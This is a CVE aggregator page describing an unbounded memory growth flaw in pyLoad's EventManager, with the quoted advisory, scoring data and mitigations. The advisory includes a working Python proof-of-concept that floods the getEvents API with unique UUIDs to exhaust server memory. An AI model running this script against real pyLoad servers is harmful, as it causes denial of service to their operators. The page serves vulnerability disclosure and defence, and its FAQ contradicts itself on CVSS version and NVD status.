CVE-2026-48987

MEDIUMPre-NVD 6.56.5
EchelonGraph scoreHIGH confidence

Score 6.5 from GitHub Security Advisory published 2026-07-09. the CNA's CVSS baseline 6.5; sources differ by 0.0.

Triggered by: GitHub Security Advisory CVSS
Sources: cna:github_m, ghsa
6.5
EchelonGraph verdictMonitorLow exploitation likelihood right now — keep watching.
  • Lower severity and no public exploit yet
CISA-KEV: Not listedEPSS: CVSS: 6.5Exploit: NoneExposed: 0

No vendor fix yet — apply a workaround or compensating control (WAF / firewall / segmentation) and watch for a patch.

pyLoad: Unbounded Memory Growth Leading to DoS and Potential DDoS in EventManager

Description:

The EventManager module in pyload manages a list of Client instances for subscribing to events. The addition of each unique uuid from the get_events API causes the creation of a Client instance that gets appended to the clients list. Although there is a clean() method available in the EventManager module for removing non-responding Client instances, this method is never used in the EventManager or in the entire core application code. Consequently, this causes an uncontrolled growth in memory consumption until it becomes exhausted, resulting in a DoS attack.

Vulnerable Code:

https://github.com/pyload/pyload/blob/355c3f8d78a91f72d049e58f1edee8a972f845eb/src/pyload/core/managers/event_manager.py#L16-L17

> Here the client is added to the clients list but never cleared the inactive clients.

Exploitation:

  • Start pyLoad server (Ensure the pyload server is running)
  • Authenticate: Obtain a session cookie or an API key (Here i used the API key).
  • Send Requests: Run the below poc script to send a large number of requests to the getEvents API endpoint, each with a unique uuid.
import requests
import uuid
import time

Configuration

URL = "http://localhost:8000/api/getEvents" NUM_REQUESTS = 100000

headers = { "X-API-Key" : "" }

print(f"Starting DoS attack: sending {NUM_REQUESTS} unique UUIDs...")

for i in range(NUM_REQUESTS): # Generating a new UUID uid = str(uuid.uuid4()) try: # Sending request requests.get(URL, params={"uuid": uid}, headers=headers, timeout=5) if i % 1000 == 0: print(f"Sent {i} requests...") except requests.exceptions.RequestException as e: print(f"Error at request {i}: {e}") break

print("Attack complete. Check memory usage.")

  • Monitor Memory: Monitor the memory usage of the pyload process (e.g., using top, ps or the following commands).
PID=$(pgrep -f "pyload"); while true; do ps -o rss= -p $PID; sleep 1; done
  • Observe Growth: Notice that the memory consumption increases and never decreases, even after the requests stop and 30 seconds.

https://github.com/user-attachments/assets/28d460c9-655d-45a1-a47f-c0f4d196f686

Impact:

  • Denial of Service (DoS). The pyload process will consume all available system memory, leading to an Out-of-Memory (OOM) kill by the operating system or system-wide instability, affecting other services on the host.

Mitigations:

  • Invoke clean(): Call self.clean() at the beginning of the get_events method to purge inactive clients before processing new ones.
  • Rate Limiting: Implement rate limiting on the getEvents endpoint to prevent a single client from flooding the server with unique UUIDs.

CVSS v3
6.5
EG Score
6.5(high)
EPSS
KEV
Not listed

Published

July 9, 2026

Last Modified

July 9, 2026

Vendor Advisories for CVE-2026-48987(1)

These vendors published their own advisory mentioning this CVE — often with vendor-specific remediation steps + affected product lists not in NVD.

Patch Availability(1)

Vendor / EcosystemFixed in / PatchReleasedSource
pippyload-ngghsa

Patches are aggregated from vendor advisories (Red Hat, Microsoft, Cisco, GitHub) and package ecosystems (OSV, GHSA). Multiple rows for the same upstream release have been deduplicated.

Weakness Classification(3)

MITRE Common Weakness Enumeration — the root-cause categories this CVE belongs to.

Data Freshness Timeline

(refreshed 10× in last 7d / 10× in last 30d)

Each row is a source pipeline that fetched or updated this CVE on that date, with what changed. For example, "NVD update" means NVD published or revised its analysis for this CVE; "MITRE cvelistV5" means we ingested or refreshed it from the CNA feed. Most recent first.

  1. 2026-07-13 06:17 UTCEG score recompute
  2. 2026-07-13 06:17 UTCGHSA enrichment
  3. 2026-07-12 08:09 UTCEG score recompute
  4. 2026-07-12 08:09 UTCGHSA enrichment
  5. 2026-07-11 10:01 UTCEG score recompute
  6. 2026-07-11 10:01 UTCGHSA enrichment
  7. 2026-07-10 11:53 UTCEG score recompute
  8. 2026-07-10 11:53 UTCGHSA enrichment
  9. 2026-07-09 13:45 UTCEG score recompute
  10. 2026-07-09 13:45 UTCGHSA enrichment

Frequently asked(4)

What is CVE-2026-48987?
CVE-2026-48987 is a medium vulnerability published on July 9, 2026. pyLoad: Unbounded Memory Growth Leading to DoS and Potential DDoS in EventManager Description: The EventManager module in pyload manages a list of Client instances for subscribing to events. The addition of each unique uuid from the get_events API causes the creation of a Client instance that gets…
When was CVE-2026-48987 disclosed?
CVE-2026-48987 was first published in the National Vulnerability Database on July 9, 2026. EchelonGraph re-ingests CVE updates from NVD on a 2-hour cycle, so this page reflects the latest published state.
What is the CVSS score of CVE-2026-48987?
CVE-2026-48987 has a CVSS v4.0 base score of 6.5 (CNA self-assessment; NVD's own analysis pending).
How do I remediate CVE-2026-48987?
Patch to the fixed version published by the affected vendor. Where vendor advisories exist for CVE-2026-48987, EchelonGraph cross-links them in the Vendor Advisories panel below — those typically contain the canonical remediation steps, fixed version numbers, and any vendor-specific mitigations.

Dependency Blast Radius

Explore the affected products and dependency analysis for CVE-2026-48987

Explore →

Is Your Infrastructure Affected by CVE-2026-48987?

EchelonGraph automatically scans your cloud infrastructure and maps CVE exposure using blast radius analysis.